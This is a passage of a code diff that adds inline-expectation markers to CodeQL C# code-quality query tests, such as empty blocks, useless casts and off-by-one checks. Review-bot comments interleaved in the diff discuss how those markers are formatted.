Documentation/XmldocMissingSummary.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Documentation/XmldocMissingTypeParam.qlref b/csharp/ql/test/query-tests/Documentation/XmldocMissingTypeParam.qlref index f06bbb263d02..7090a1612d89 100644 --- a/csharp/ql/test/query-tests/Documentation/XmldocMissingTypeParam.qlref +++ b/csharp/ql/test/query-tests/Documentation/XmldocMissingTypeParam.qlref @@ -1 +1,2 @@ -Documentation/XmldocMissingTypeParam.ql +query: Documentation/XmldocMissingTypeParam.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/csharp/ql/test/query-tests/Documentation/documentation.cs b/csharp/ql/test/query-tests/Documentation/documentation.cs index 810e9b5a34af..1efeeb8d4599 100644 --- a/csharp/ql/test/query-tests/Documentation/documentation.cs +++ b/csharp/ql/test/query-tests/Documentation/documentation.cs @@ -30,13 +30,13 @@ public virtual int method1(int p1, int p2) /// BAD: This XML comment is missing several tags /// BAD: This parameter does not exist /// BAD: This should say Exception2 - public int method2(int p1, int p2) + public int method2(int p1, int p2) // $ Alert[cs/xmldoc/missing-exception] Alert[cs/xmldoc/missing-parameter] Alert[cs/xmldoc/missing-return] Alert[cs/xmldoc/missing-summary] Alert[cs/xmldoc/unknown-parameter] { return p1 > 0 ? throw new Exception2() : p2; } // BAD: Missing documentation comment - public int method3() + public int method3() // $ Alert[cs/xmldoc/missing-xmldoc] { return 0; } @@ -48,7 +48,7 @@ internal int method4() } // BAD: Public class is not documented - public class Class2 + public class Class2 // $ Alert[cs/xmldoc/missing-xmldoc] { } @@ -71,7 +71,7 @@ public Class1(int p) } // BAD: Constructor is public and not documented - public Class1(int a, int b) + public Class1(int a, int b) // $ Alert[cs/xmldoc/missing-xmldoc] { } @@ -80,7 +80,7 @@ public Class1(int a, int b) /// BAD: Contains an extra typeparam /// /// The type - class Class4 { } + class Class4 { } // $ Alert[cs/xmldoc/missing-type-parameter] Alert[cs/xmldoc/unknown-type-parameter] ///

/// GOOD: Type params are correctly labeled @@ -95,7 +95,7 @@ class Class5 { } /// /// BAD typeparam /// GOOD typeparam - void method5() { } + void method5() { } // $ Alert[cs/xmldoc/missing-type-parameter] Alert[cs/xmldoc/unknown-type-parameter] // BAD: These fields are empty /// @@ -103,7 +103,7 @@ void method5() { } /// /// /// - public virtual int method4(int p1, int p2) { return p1; } + public virtual int method4(int p1, int p2) { return p1; } // $ Alert[cs/xmldoc/missing-parameter] Alert[cs/xmldoc/missing-return] Alert[cs/xmldoc/missing-summary] Alert[cs/xmldoc/missing-type-parameter] } class Class2 : Class1 @@ -132,7 +132,7 @@ public void method5() // BAD: Has only System.Runtime.CompilerServices attribute [System.Runtime.CompilerServices.My2] - public void method6() + public void method6() // $ Alert[cs/xmldoc/missing-xmldoc] { } } diff --git a/csharp/ql/test/query-tests/EmptyBlock/EmptyBlock.cs b/csharp/ql/test/query-tests/EmptyBlock/EmptyBlock.cs index b3e0cff6ae30..4095af2863a4 100644 --- a/csharp/ql/test/query-tests/EmptyBlock/EmptyBlock.cs +++ b/csharp/ql/test/query-tests/EmptyBlock/EmptyBlock.cs @@ -7,7 +7,7 @@ static void Method(string[] args) // BAD foreach (var arg in args) { - } + } // $ Alert // OK - comment foreach (var arg in args) @@ -24,7 +24,7 @@ static void Method(string[] args) // BAD if (true) { - } + } // $ Alert // OK - comment if (true) @@ -46,6 +46,6 @@ static void Method(string[] args) // BAD: there is no update for (int i = 0; i < 10;) { - } + } // $ Alert } } diff --git a/csharp/ql/test/query-tests/EmptyBlock/EmptyBlock.qlref b/csharp/ql/test/query-tests/EmptyBlock/EmptyBlock.qlref index af8a3a21f8a7..5fe264815b80 100644 --- a/csharp/ql/test/query-tests/EmptyBlock/EmptyBlock.qlref +++ b/csharp/ql/test/query-tests/EmptyBlock/EmptyBlock.qlref @@ -1 +1,2 @@ -Likely Bugs/Statements/EmptyBlock.ql +query: Likely Bugs/Statements/EmptyBlock.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/csharp/ql/test/query-tests/Language Abuse/CatchOfGenericException/CatchOfGenericException.cs b/csharp/ql/test/query-tests/Language Abuse/CatchOfGenericException/CatchOfGenericException.cs index 64c4038d3319..45dc182cc729 100644 --- a/csharp/ql/test/query-tests/Language Abuse/CatchOfGenericException/CatchOfGenericException.cs +++ b/csharp/ql/test/query-tests/Language Abuse/CatchOfGenericException/CatchOfGenericException.cs @@ -9,14 +9,14 @@ void M(bool rethrow) } catch (Exception) { // BAD - } + } // $ Alert try { } catch { // BAD - } + } // $ Alert try { @@ -53,6 +53,6 @@ double reciprocal(double input) { // BAD // division by zero, return 0 return 0; - } + } // $ Alert } } diff --git a/csharp/ql/test/query-tests/Language Abuse/CatchOfGenericException/CatchOfGenericException.qlref b/csharp/ql/test/query-tests/Language Abuse/CatchOfGenericException/CatchOfGenericException.qlref index 9606fc128a75..c5b986a2b663 100644 --- a/csharp/ql/test/query-tests/Language Abuse/CatchOfGenericException/CatchOfGenericException.qlref +++ b/csharp/ql/test/query-tests/Language Abuse/CatchOfGenericException/CatchOfGenericException.qlref @@ -1 +1,2 @@ -Language Abuse/CatchOfGenericException.ql \ No newline at end of file +query: Language Abuse/CatchOfGenericException.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Language Abuse/ChainedIs/ChainedIs.cs b/csharp/ql/test/query-tests/Language Abuse/ChainedIs/ChainedIs.cs index ffe1da808750..06899677ffe8 100644 --- a/csharp/ql/test/query-tests/Language Abuse/ChainedIs/ChainedIs.cs +++ b/csharp/ql/test/query-tests/Language Abuse/ChainedIs/ChainedIs.cs @@ -62,7 +62,7 @@ public void M(object x) } else if (x is F) { - } // BAD + } // BAD // $ Alert } class A { } diff --git a/csharp/ql/test/query-tests/Language Abuse/ChainedIs/ChainedIs.qlref b/csharp/ql/test/query-tests/Language Abuse/ChainedIs/ChainedIs.qlref index 0d67fca32396..a46923159024 100644 
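Review bot: In ChainedIs.cs the expectation is appended after an existing comment, `} // BAD // $ Alert`, and as far as I know the shared inline-expectations parser only reads a comment as an expectation when `$` is its first non-whitespace character, so this one may not be picked up. If that holds, the alert on this line would be reported as unexpected instead of matched; writing it as `} // $ Alert // BAD` keeps the human note as a trailing plain comment. The same `// BAD // $ Alert` form recurs in later hunks of this patch, for example in RethrowException.cs, UselessNullCoalescingExpression.cs, UselessUpcast.cs and DangerousNonShortCircuitLogic.cs. M's body starts above the hunk.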
--- a/csharp/ql/test/query-tests/Language Abuse/ChainedIs/ChainedIs.qlref +++ b/csharp/ql/test/query-tests/Language Abuse/ChainedIs/ChainedIs.qlref @@ -1 +1,2 @@ -Language Abuse/ChainedIs.ql +query: Language Abuse/ChainedIs.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Language Abuse/DubiousTypeTestOfThis/DubiousTypeTestOfThis.cs b/csharp/ql/test/query-tests/Language Abuse/DubiousTypeTestOfThis/DubiousTypeTestOfThis.cs index a6cad0e456e4..c8a3e85f3630 100644 --- a/csharp/ql/test/query-tests/Language Abuse/DubiousTypeTestOfThis/DubiousTypeTestOfThis.cs +++ b/csharp/ql/test/query-tests/Language Abuse/DubiousTypeTestOfThis/DubiousTypeTestOfThis.cs @@ -4,10 +4,10 @@ class BaseClass { public int add(int x) { - if (this is FiveAdder) + if (this is FiveAdder) // $ Alert return x + 5; - if (this is TenAdder) + if (this is TenAdder) // $ Alert return x + 10; return 0; diff --git a/csharp/ql/test/query-tests/Language Abuse/DubiousTypeTestOfThis/DubiousTypeTestOfThis.qlref b/csharp/ql/test/query-tests/Language Abuse/DubiousTypeTestOfThis/DubiousTypeTestOfThis.qlref index cf59e9dbd51a..c51f8fb4f465 100644 --- a/csharp/ql/test/query-tests/Language Abuse/DubiousTypeTestOfThis/DubiousTypeTestOfThis.qlref +++ b/csharp/ql/test/query-tests/Language Abuse/DubiousTypeTestOfThis/DubiousTypeTestOfThis.qlref @@ -1 +1,2 @@ -Language Abuse/DubiousTypeTestOfThis.ql \ No newline at end of file +query: Language Abuse/DubiousTypeTestOfThis.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Language Abuse/DubiousTypeTestOfThis/DubiousTypeTestOfThis2.cs b/csharp/ql/test/query-tests/Language Abuse/DubiousTypeTestOfThis/DubiousTypeTestOfThis2.cs index 0c3a8e543f7d..6fc16c4428c7 100644 --- a/csharp/ql/test/query-tests/Language Abuse/DubiousTypeTestOfThis/DubiousTypeTestOfThis2.cs +++ b/csharp/ql/test/query-tests/Language Abuse/DubiousTypeTestOfThis/DubiousTypeTestOfThis2.cs 
@@ -5,7 +5,7 @@ class C { void M() { - if (this is D) ; // BAD + if (this is D) ; // BAD // $ Alert Debug.Assert(this is D); // GOOD } } diff --git a/csharp/ql/test/query-tests/Language Abuse/ForeachCapture/ForeachCapture.cs b/csharp/ql/test/query-tests/Language Abuse/ForeachCapture/ForeachCapture.cs index 18fdcc9c1bc9..9af0f31392da 100644 --- a/csharp/ql/test/query-tests/Language Abuse/ForeachCapture/ForeachCapture.cs +++ b/csharp/ql/test/query-tests/Language Abuse/ForeachCapture/ForeachCapture.cs @@ -11,7 +11,7 @@ static void Main(string[] args) foreach (var arg in args) { // BAD: Storing a delegate in an event. - event1 += () => arg; + event1 += () => arg; // $ Alert // GOOD: Make a copy of the loop variable. var argCopy = arg; @@ -21,7 +21,7 @@ static void Main(string[] args) goodUseOfDelegate(() => arg); // BAD: Calling a function which stores the delegate - badUseOfDelegate(() => arg); + badUseOfDelegate(() => arg); // $ Alert // GOOD: The delegate does not escape the loop Del d = () => arg; diff --git a/csharp/ql/test/query-tests/Language Abuse/ForeachCapture/ForeachCapture.qlref b/csharp/ql/test/query-tests/Language Abuse/ForeachCapture/ForeachCapture.qlref index 733f31198af9..01f701f769f9 100644 --- a/csharp/ql/test/query-tests/Language Abuse/ForeachCapture/ForeachCapture.qlref +++ b/csharp/ql/test/query-tests/Language Abuse/ForeachCapture/ForeachCapture.qlref @@ -1 +1,2 @@ -Language Abuse/ForeachCapture.ql +query: Language Abuse/ForeachCapture.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Language Abuse/MissedTernaryOpportunity/MissedTernaryOpportunity.cs b/csharp/ql/test/query-tests/Language Abuse/MissedTernaryOpportunity/MissedTernaryOpportunity.cs index 407bde9643e4..82bdb9152162 100644 --- a/csharp/ql/test/query-tests/Language Abuse/MissedTernaryOpportunity/MissedTernaryOpportunity.cs +++ b/csharp/ql/test/query-tests/Language Abuse/MissedTernaryOpportunity/MissedTernaryOpportunity.cs 
@@ -6,11 +6,11 @@ public bool M() { if (true) { return false; } else { Field++; return true; } // GOOD return true ? false : true; // GOOD - if (true) return false; else { { return true; } } // BAD + if (true) return false; else { { return true; } } // BAD // $ Alert var x = ""; if (true) { Field = 0; } else { x = ""; } // GOOD if (true) { Field = 0; } else { x = ""; Field = 1; } // GOOD Field = true ? 0 : 1; // GOOD - if (true) { this.Field = 0; } else Field = 1; // BAD + if (true) { this.Field = 0; } else Field = 1; // BAD // $ Alert } } diff --git a/csharp/ql/test/query-tests/Language Abuse/MissedTernaryOpportunity/MissedTernaryOpportunity.qlref b/csharp/ql/test/query-tests/Language Abuse/MissedTernaryOpportunity/MissedTernaryOpportunity.qlref index 7efb97ac6fe4..4d45b7edd2fb 100644 --- a/csharp/ql/test/query-tests/Language Abuse/MissedTernaryOpportunity/MissedTernaryOpportunity.qlref +++ b/csharp/ql/test/query-tests/Language Abuse/MissedTernaryOpportunity/MissedTernaryOpportunity.qlref @@ -1 +1,2 @@ -Language Abuse/MissedTernaryOpportunity.ql +query: Language Abuse/MissedTernaryOpportunity.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Language Abuse/NestedIf/NestedIf.qlref b/csharp/ql/test/query-tests/Language Abuse/NestedIf/NestedIf.qlref index c3c2012be180..19cd4d8ca684 100644 --- a/csharp/ql/test/query-tests/Language Abuse/NestedIf/NestedIf.qlref +++ b/csharp/ql/test/query-tests/Language Abuse/NestedIf/NestedIf.qlref @@ -1 +1,2 @@ -Language Abuse/NestedIf.ql \ No newline at end of file +query: Language Abuse/NestedIf.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Language Abuse/NestedIf/nestedif.cs b/csharp/ql/test/query-tests/Language Abuse/NestedIf/nestedif.cs index 733325d2c597..bb59facd9c89 100644 --- a/csharp/ql/test/query-tests/Language Abuse/NestedIf/nestedif.cs +++ b/csharp/ql/test/query-tests/Language Abuse/NestedIf/nestedif.cs 
@@ -5,10 +5,10 @@ class NestedIf void fn() { // BAD: - if (true) if (false) return; + if (true) if (false) return; // $ Alert // BAD - if (true) if (false) if (true) return; + if (true) if (false) if (true) return; // $ Alert // BAD: using braces if (true) @@ -18,7 +18,7 @@ void fn() { } } - } + } // $ Alert // GOOD: contains else part if (true) diff --git a/csharp/ql/test/query-tests/Language Abuse/RethrowException/RethrowException.cs b/csharp/ql/test/query-tests/Language Abuse/RethrowException/RethrowException.cs index ee7cf41a0a21..46a42769944a 100644 --- a/csharp/ql/test/query-tests/Language Abuse/RethrowException/RethrowException.cs +++ b/csharp/ql/test/query-tests/Language Abuse/RethrowException/RethrowException.cs @@ -9,7 +9,7 @@ static void Main(string[] args) } catch (Exception e) { - throw e; // BAD + throw e; // BAD // $ Alert } try @@ -18,7 +18,7 @@ static void Main(string[] args) catch (Exception e) { if (true) - throw e; // BAD + throw e; // BAD // $ Alert } try diff --git a/csharp/ql/test/query-tests/Language Abuse/RethrowException/RethrowException.qlref b/csharp/ql/test/query-tests/Language Abuse/RethrowException/RethrowException.qlref index b406a8b5fccd..1f83a6b74e62 100644 --- a/csharp/ql/test/query-tests/Language Abuse/RethrowException/RethrowException.qlref +++ b/csharp/ql/test/query-tests/Language Abuse/RethrowException/RethrowException.qlref @@ -1 +1,2 @@ -Language Abuse/RethrowException.ql \ No newline at end of file +query: Language Abuse/RethrowException.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Language Abuse/SimplifyBoolExpr/SimplifyBoolExpr.cs b/csharp/ql/test/query-tests/Language Abuse/SimplifyBoolExpr/SimplifyBoolExpr.cs index 5ea4c8c15cf5..175507010a13 100644 --- a/csharp/ql/test/query-tests/Language Abuse/SimplifyBoolExpr/SimplifyBoolExpr.cs +++ b/csharp/ql/test/query-tests/Language Abuse/SimplifyBoolExpr/SimplifyBoolExpr.cs 
@@ -6,36 +6,36 @@ void Fn() bool b = false; int x = 0, y = 0; - if (b == true) ; - if (b == false) ; - if (true == b) ; - if (false == b) ; - if (b != true) ; - if (b != false) ; - if (true != b) ; - if (false != b) ; - if (b && true) ; - if (b && false) ; - if (true && b) ; - if (false && b) ; - if (b || true) ; - if (b || false) ; - if (true || b) ; - if (false || b) ; - if (!(x == y)) ; - if (!(x != y)) ; - if (!(x < y)) ; - if (!(x <= y)) ; - if (!(x >= y)) ; - if (!(x > y)) ; - if (b ? true : false) ; - if (b ? true : true) ; - if (b ? false : true) ; - if (b ? true : true) ; - if (b ? b : false) ; - if (b ? b : true) ; - if (b ? false : b) ; - if (b ? true : b) ; + if (b == true) ; // $ Alert + if (b == false) ; // $ Alert + if (true == b) ; // $ Alert + if (false == b) ; // $ Alert + if (b != true) ; // $ Alert + if (b != false) ; // $ Alert + if (true != b) ; // $ Alert + if (false != b) ; // $ Alert + if (b && true) ; // $ Alert + if (b && false) ; // $ Alert + if (true && b) ; // $ Alert + if (false && b) ; // $ Alert + if (b || true) ; // $ Alert + if (b || false) ; // $ Alert + if (true || b) ; // $ Alert + if (false || b) ; // $ Alert + if (!(x == y)) ; // $ Alert + if (!(x != y)) ; // $ Alert + if (!(x < y)) ; // $ Alert + if (!(x <= y)) ; // $ Alert + if (!(x >= y)) ; // $ Alert + if (!(x > y)) ; // $ Alert + if (b ? true : false) ; // $ Alert + if (b ? true : true) ; // $ Alert + if (b ? false : true) ; // $ Alert + if (b ? true : true) ; // $ Alert + if (b ? b : false) ; // $ Alert + if (b ? b : true) ; // $ Alert + if (b ? false : b) ; // $ Alert + if (b ? true : b) ; // $ Alert // BAD if (true ? b : b) ; diff --git a/csharp/ql/test/query-tests/Language Abuse/SimplifyBoolExpr/SimplifyBoolExpr.qlref b/csharp/ql/test/query-tests/Language Abuse/SimplifyBoolExpr/SimplifyBoolExpr.qlref index 27f8ee90aa90..222fc236213b 100644 --- a/csharp/ql/test/query-tests/Language Abuse/SimplifyBoolExpr/SimplifyBoolExpr.qlref 
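Review bot: The `// BAD` case `if (true ? b : b) ;` at the end of the SimplifyBoolExpr.cs hunk is left without an expectation while every line above it gains `// $ Alert`. Once the .qlref routes results through InlineExpectationsTestQuery.ql, a case the query is known not to report is normally recorded as `if (true ? b : b) ; // $ MISSING: Alert`, so the gap stays visible in the test; if the query is not meant to flag it, the `// BAD` comment should be corrected instead. The same applies to `func = (Func)(x => x); // MISSING` in UselessCastToSelf.cs and, it seems, to `b = args.LongLength >= 0L;` under `// NOT OK` in ContainerSizeCmpZero.cs. Fn's body continues past the hunk.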
+++ b/csharp/ql/test/query-tests/Language Abuse/SimplifyBoolExpr/SimplifyBoolExpr.qlref @@ -1 +1,2 @@ -Language Abuse/SimplifyBoolExpr.ql \ No newline at end of file +query: Language Abuse/SimplifyBoolExpr.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Language Abuse/SimplifyBoolExpr/SimplifyBoolExprBad.cs b/csharp/ql/test/query-tests/Language Abuse/SimplifyBoolExpr/SimplifyBoolExprBad.cs index e65c2a88fbf7..89e72c2780ab 100644 --- a/csharp/ql/test/query-tests/Language Abuse/SimplifyBoolExpr/SimplifyBoolExprBad.cs +++ b/csharp/ql/test/query-tests/Language Abuse/SimplifyBoolExpr/SimplifyBoolExprBad.cs @@ -2,7 +2,7 @@ class Bad { int Size { get; set; } - bool Espresso => !(Size > 4); - bool Latte => Espresso == false && Size <= 8; - bool Grande => Espresso == false ? Latte != true : false; + bool Espresso => !(Size > 4); // $ Alert + bool Latte => Espresso == false && Size <= 8; // $ Alert + bool Grande => Espresso == false ? Latte != true : false; // $ Alert } diff --git a/csharp/ql/test/query-tests/Language Abuse/UselessCastToSelf/UselessCastToSelf.cs b/csharp/ql/test/query-tests/Language Abuse/UselessCastToSelf/UselessCastToSelf.cs index e3aa1ad3067c..e39cd89f15c1 100644 --- a/csharp/ql/test/query-tests/Language Abuse/UselessCastToSelf/UselessCastToSelf.cs +++ b/csharp/ql/test/query-tests/Language Abuse/UselessCastToSelf/UselessCastToSelf.cs @@ -6,11 +6,11 @@ class Test void f() { // BAD - var bad1 = (int)1; - var bad2 = (Test)this; - var bad3 = this as Test; + var bad1 = (int)1; // $ Alert + var bad2 = (Test)this; // $ Alert + var bad3 = this as Test; // $ Alert func = (Func)(x => x); // MISSING - exprFunc = (Expression>)(x => x); + exprFunc = (Expression>)(x => x); // $ Alert // GOOD var good1 = (object)1; 
@@ -22,16 +22,16 @@ void f() var good7 = (Action)((int x) => { }); func = x => x; exprFunc = x => x; - exprFuncUntyped = (Expression>)(x => x); // FP + exprFuncUntyped = (Expression>)(x => x); // FP // $ Alert } enum Enum { A = 2, B = 1 | A, - C = 1 | (int)A, // BAD + C = 1 | (int)A, // BAD // $ Alert D = 9 | (32 << A), - E = 9 | (32 << (int)A) // BAD + E = 9 | (32 << (int)A) // BAD // $ Alert } private Func func; diff --git a/csharp/ql/test/query-tests/Language Abuse/UselessCastToSelf/UselessCastToSelf.qlref b/csharp/ql/test/query-tests/Language Abuse/UselessCastToSelf/UselessCastToSelf.qlref index 7a137fff0870..6e56b5c55af3 100644 --- a/csharp/ql/test/query-tests/Language Abuse/UselessCastToSelf/UselessCastToSelf.qlref +++ b/csharp/ql/test/query-tests/Language Abuse/UselessCastToSelf/UselessCastToSelf.qlref @@ -1 +1,2 @@ -Language Abuse/UselessCastToSelf.ql \ No newline at end of file +query: Language Abuse/UselessCastToSelf.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Language Abuse/UselessIsBeforeAs/UselessIsBeforeAs.cs b/csharp/ql/test/query-tests/Language Abuse/UselessIsBeforeAs/UselessIsBeforeAs.cs index af7d26c98f58..13893c684290 100644 --- a/csharp/ql/test/query-tests/Language Abuse/UselessIsBeforeAs/UselessIsBeforeAs.cs +++ b/csharp/ql/test/query-tests/Language Abuse/UselessIsBeforeAs/UselessIsBeforeAs.cs @@ -5,7 +5,7 @@ public object M(object x) if (x is string) { M(x as string); // GOOD - return (x as string) + " "; // BAD + return (x as string) + " "; // BAD // $ Alert } else { diff --git a/csharp/ql/test/query-tests/Language Abuse/UselessIsBeforeAs/UselessIsBeforeAs.qlref b/csharp/ql/test/query-tests/Language Abuse/UselessIsBeforeAs/UselessIsBeforeAs.qlref index 9a5a7fd703c1..3c499bb78025 100644 --- a/csharp/ql/test/query-tests/Language Abuse/UselessIsBeforeAs/UselessIsBeforeAs.qlref +++ b/csharp/ql/test/query-tests/Language Abuse/UselessIsBeforeAs/UselessIsBeforeAs.qlref 
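Review bot: `exprFuncUntyped = (Expression>)(x => x); // FP // $ Alert` in UselessCastToSelf.cs records a known false positive as an ordinary expected alert. The inline-expectations format has a marker for this, `// $ SPURIOUS: Alert`, which passes while the query still reports the line and fails once it stops, so the expectation gets cleaned up when the false positive is fixed. With a plain `Alert` the test instead pins the wrong behaviour as the desired one. f's body starts above the hunk.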
@@ -1 +1,2 @@ -Language Abuse/UselessIsBeforeAs.ql +query: Language Abuse/UselessIsBeforeAs.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Language Abuse/UselessNullCoalescingExpression/UselessNullCoalescingExpression.cs b/csharp/ql/test/query-tests/Language Abuse/UselessNullCoalescingExpression/UselessNullCoalescingExpression.cs index f05782416fd5..b8dd096a0874 100644 --- a/csharp/ql/test/query-tests/Language Abuse/UselessNullCoalescingExpression/UselessNullCoalescingExpression.cs +++ b/csharp/ql/test/query-tests/Language Abuse/UselessNullCoalescingExpression/UselessNullCoalescingExpression.cs @@ -6,14 +6,14 @@ void Main(int? param) { int? a = 5, b; - a = a ?? a; // BAD - a = a ?? (b = a); // BAD - a = Prop ?? Prop; // BAD - a = param ?? param; // BAD - a = a ?? use(a); // BAD - a = Field ?? this.Field; // BAD - a ??= a; // BAD - a ??= b = a; // BAD + a = a ?? a; // BAD // $ Alert + a = a ?? (b = a); // BAD // $ Alert + a = Prop ?? Prop; // BAD // $ Alert + a = param ?? param; // BAD // $ Alert + a = a ?? use(a); // BAD // $ Alert + a = Field ?? this.Field; // BAD // $ Alert + a ??= a; // BAD // $ Alert + a ??= b = a; // BAD // $ Alert a = a ?? cache(ref a); // GOOD a = a ?? store(out a); // GOOD diff --git a/csharp/ql/test/query-tests/Language Abuse/UselessNullCoalescingExpression/UselessNullCoalescingExpression.qlref b/csharp/ql/test/query-tests/Language Abuse/UselessNullCoalescingExpression/UselessNullCoalescingExpression.qlref index 1eb957001c9e..1145cc6ae816 100644 --- a/csharp/ql/test/query-tests/Language Abuse/UselessNullCoalescingExpression/UselessNullCoalescingExpression.qlref +++ b/csharp/ql/test/query-tests/Language Abuse/UselessNullCoalescingExpression/UselessNullCoalescingExpression.qlref @@ -1 +1,2 @@ -Language Abuse/UselessNullCoalescingExpression.ql \ No newline at end of file +query: Language Abuse/UselessNullCoalescingExpression.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/csharp/ql/test/query-tests/Language Abuse/UselessUpcast/UselessUpcast.cs b/csharp/ql/test/query-tests/Language Abuse/UselessUpcast/UselessUpcast.cs index 0ec950e836d3..dc9f4c184ad7 100644 --- a/csharp/ql/test/query-tests/Language Abuse/UselessUpcast/UselessUpcast.cs +++ b/csharp/ql/test/query-tests/Language Abuse/UselessUpcast/UselessUpcast.cs @@ -49,13 +49,13 @@ void Test1(string[] args) B b = new B(); object o; - o = (A)b; // BAD + o = (A)b; // BAD // $ Alert o = (B)b; // GOOD: Not an upcast b.M((A)b); // GOOD: Disambiguating method call - a.M1((A)b); // BAD + a.M1((A)b); // BAD // $ Alert a.M2((A)b); // GOOD: Disambiguating method call o = true ? (A)a : b; // GOOD: Needed for ternary @@ -64,7 +64,7 @@ void Test1(string[] args) Fn((A)b); // GOOD: Disambiguating method call - Fn2((A)b); // BAD + Fn2((A)b); // BAD // $ Alert ((I2)a).Foo(); // GOOD: Cast to an interface @@ -80,7 +80,7 @@ void Test1(string[] args) StaticMethods.M1((A)b); // GOOD: disambiguate targets from `StaticMethods` void M2(A _) { } - M2((A)b); // BAD: local functions cannot be overloaded + M2((A)b); // BAD: local functions cannot be overloaded // $ Alert } static void M2(A _) { } @@ -89,7 +89,7 @@ void Test2(B b) { // BAD: even though `StaticMethods` has an `M2`, only overloads in // `Tests` are taken into account - M2((A)b); + M2((A)b); // $ Alert } class Nested @@ -100,7 +100,7 @@ static void Test(C c) { // BAD: even though `StaticMethods` and `Tests` have `M2`s, only // overloads in `Nested` are taken into account - M2((B)c); + M2((B)c); // $ Alert } } } @@ -155,11 +155,11 @@ public Sub(Sub s) : base((I1)s) { } // GOOD class SubSub : Sub { - SubSub(SubSub ss) : base((Sub)ss) { } // BAD + SubSub(SubSub ss) : base((Sub)ss) { } // BAD // $ Alert void M(SubSub ss) { - new Sub((Sub)ss); // BAD + new Sub((Sub)ss); // BAD // $ Alert } } 
diff --git a/csharp/ql/test/query-tests/Language Abuse/UselessUpcast/UselessUpcast.qlref b/csharp/ql/test/query-tests/Language Abuse/UselessUpcast/UselessUpcast.qlref index f0a49b78b14b..d48a3f989428 100644 --- a/csharp/ql/test/query-tests/Language Abuse/UselessUpcast/UselessUpcast.qlref +++ b/csharp/ql/test/query-tests/Language Abuse/UselessUpcast/UselessUpcast.qlref @@ -1 +1,2 @@ -Language Abuse/UselessUpcast.ql \ No newline at end of file +query: Language Abuse/UselessUpcast.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Language Abuse/UselessUpcast/UselessUpcastBad.cs b/csharp/ql/test/query-tests/Language Abuse/UselessUpcast/UselessUpcastBad.cs index c69db3104fb1..f3c20dc5d574 100644 --- a/csharp/ql/test/query-tests/Language Abuse/UselessUpcast/UselessUpcastBad.cs +++ b/csharp/ql/test/query-tests/Language Abuse/UselessUpcast/UselessUpcastBad.cs @@ -6,6 +6,6 @@ class Sub : Super {} void M() { var sub = new Sub(); - Super super = (Super)sub; + Super super = (Super)sub; // $ Alert } } diff --git a/csharp/ql/test/query-tests/Likely Bugs/BadCheckOdd/BadCheckOdd.cs b/csharp/ql/test/query-tests/Likely Bugs/BadCheckOdd/BadCheckOdd.cs index c5e87a4ed1e6..5bdfc4d6b512 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/BadCheckOdd/BadCheckOdd.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/BadCheckOdd/BadCheckOdd.cs @@ -14,13 +14,13 @@ static void Main(string[] args) int a = 2; // BAD - if (a % 2 == 1) + if (a % 2 == 1) // $ Alert Console.Out.WriteLine("a is odd"); - if (a % 2 != 1) + if (a % 2 != 1) // $ Alert Console.Out.WriteLine("a is even"); - if (a % 2 > 0) + if (a % 2 > 0) // $ Alert Console.Out.WriteLine("a is odd"); - if ((a % 2) > 0) + if ((a % 2) > 0) // $ Alert Console.Out.WriteLine("a is odd"); // GOOD diff --git a/csharp/ql/test/query-tests/Likely Bugs/BadCheckOdd/BadCheckOdd.qlref b/csharp/ql/test/query-tests/Likely Bugs/BadCheckOdd/BadCheckOdd.qlref index 759b3f4ab230..b65ba073c357 100644 
--- a/csharp/ql/test/query-tests/Likely Bugs/BadCheckOdd/BadCheckOdd.qlref +++ b/csharp/ql/test/query-tests/Likely Bugs/BadCheckOdd/BadCheckOdd.qlref @@ -1 +1,2 @@ -Likely Bugs/BadCheckOdd.ql \ No newline at end of file +query: Likely Bugs/BadCheckOdd.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerLengthCmpOffByOne/ContainerLengthCmpOffByOne.cs b/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerLengthCmpOffByOne/ContainerLengthCmpOffByOne.cs index d68bbfc274ec..a3266b494e8d 100644 --- a/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerLengthCmpOffByOne/ContainerLengthCmpOffByOne.cs +++ b/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerLengthCmpOffByOne/ContainerLengthCmpOffByOne.cs @@ -5,13 +5,13 @@ class Test void Test1(string[] args) { // BAD: Loop upper bound is off-by-one - for (int i = 0; i <= args.Length; i++) + for (int i = 0; i <= args.Length; i++) // $ Alert { Console.WriteLine(args[i]); } // BAD: Loop upper bound is off-by-one - for (int i = 0; args.Length >= i; i++) + for (int i = 0; args.Length >= i; i++) // $ Alert { Console.WriteLine(args[i]); } @@ -24,13 +24,13 @@ void Test1(string[] args) int j = 0; // BAD: Off-by-one on index validity check - if (j <= args.Length) + if (j <= args.Length) // $ Alert { Console.WriteLine(args[j]); } // BAD: Off-by-one on index validity check - if (args.Length >= j) + if (args.Length >= j) // $ Alert { Console.WriteLine(args[j]); } diff --git a/csharp/ql/test/query-tests/Likely Bugs/Collections/ContainerLengthCmpOffByOne/ContainerLengthCmpOffByOne.qlref b/csharp/ql/test/query-tests/Likely 